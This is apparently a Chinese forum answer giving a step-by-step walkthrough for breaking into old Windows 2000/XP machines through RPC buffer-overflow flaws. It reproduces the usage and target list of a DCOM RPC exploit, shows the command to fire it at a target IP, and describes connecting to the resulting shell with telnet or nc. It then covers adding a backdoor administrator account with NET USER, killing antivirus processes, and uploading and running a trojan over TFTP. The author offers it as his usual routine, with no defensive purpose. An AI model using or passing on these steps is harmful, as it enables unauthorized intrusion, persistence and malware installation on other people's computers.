声明:本人回答问题一向原创,从不曾抄袭RPC漏洞分很多最开始从冲击波开始,震荡波,最近的魔波都属于RPC漏洞攻击首先使用RPC漏洞针对这些漏洞的扫描器进行扫描最近发现一个软件比较不错名字叫TK2006,可以扫描很多RPC漏洞,并且直接溢出得到SHELL不过我测试很多,不容易成功,也许是SP2的WINDOWS 防火墙在起作用如果想玩玩的话,可以用这个扫描,再找专用的溢出工具进行溢出例如早先的MS04011这个是我在SP1的时候溢出成功率最高的F:\\hack\\hack\\hack\\rpc\\xp.exe---------------------------------------------------------- 远程 DCOM RPC 缓冲区溢出- Original code by FlashSky and Benjurry- Rewritten by HDM <hdm [at] metasploit.com>- EXE 文件编译及修改:sagi http://www.hackerxfiles.net- Usage: /cygdrive/f/hack/hack/hack/rpc/xp <Target ID> <Target IP>- Targets:-
0
Windows 2000 SP0 (english)-
1
Windows 2000 SP0 (english2)-
2
Windows 2000 SP1 (english)-
3
Windows 2000 SP2 (english)-
4
Windows 2000 SP2 (english2)-
5
Windows 2000 SP3 (english)-
6
Windows 2000 SP3 (english2)-
7
Windows 2000 SP3 (english3)-
8
Windows 2000 SP4 (english)-
9
Windows XP SP0 (english)-
10 Windows XP SP1 (english)-
11 Windows XP SP1 (english2)-
12 Windows XP SP2 (english)-
13 Windows 2000 SP3 (chinese)-
14 Windows 2000 SP4 (chinese)-
15 Windows XP SP0 (chinese)-
16 Windows XP SP1 (chinese)-
17 Windows 2000 SP0 (japanese)-
18 Windows 2000 SP1 (japanese)-
19 Windows 2000 SP2 (japanese)-
20 Windows 2000 SP0-1 (big5)-
21 Windows 2000 SP3
(big5)-
22 Windows 2000 SP4
(big5)-
23 Windows XP SP0-1 (big5)-
24 Windows 2000 SP0(korean)-
25 Windows 2000 SP1(korean)-
26 Windows 2000 SP2(korean)-
27 Windows 2000 SP4(korean)上面是这个溢出程序的说明在命令行的格式是这样的C:\\xp 16 192.168.0.100 XP是溢出程序 16 是要溢出的系统版本 192.168.0.100是要溢出的IP地址如果溢出提示成功的话,会提示端口号一般用TELNET来连接,比如溢出端口号为1234命令写:C:\\telnet 192.168.0.100 1234但是TELNET连接是完全盲打的,不显示任何文字所以我用NC.exenc 192.168.0.100 1234 具体NC还有很多参数,见BAIDU如果提示成功的话就会登陆到对方的C:\\WINDOWS\\SYSTEM目录下了这个时候添加管理员帐户,NET USER IMTJSUN 1234 /AD提升权限
NET LOCALGROUP ADMINISTRATORS IMTJSUN /AD一般我会先列出进程,检查有没有杀毒软件输入:tasklist如果有比如瑞星进程,TASKKILL 掉那个进程下一步上传病毒我用tftp32.exe在本机使用这个程序可以做成一个小的FTP服务器GET木马程序然后执行木马程序最后远程连接这个是我一惯使用的伎俩注:本人已经不在研究这些东西很久了,难免有些过时,见谅!!再次声明:本人回答问题一向原创,从不曾抄袭
